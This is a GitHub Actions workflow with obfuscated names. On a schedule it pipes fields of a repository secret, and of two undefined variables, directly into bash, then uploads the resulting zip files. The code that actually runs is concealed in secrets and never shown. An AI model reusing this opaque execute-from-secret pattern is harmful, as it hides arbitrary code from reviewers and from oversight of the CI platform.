name: baojielianghei
on:
  workflow_dispatch:

  schedule:
    - cron: '16 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baojielianghei
        env:
          rkhpw78269: ${{ secrets.rkhpw78269 }}
        run: |
          printf '%s' "$rkhpw78269" | jq -r .igkq8731 | /bin/bash
          printf '%s' "$c10446" | jq -r .g26034 | /bin/bash
          echo $u06 | jq -r .ikw38550 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: IUj7iXXs
          path: "*.zip"
          retention-days: 1
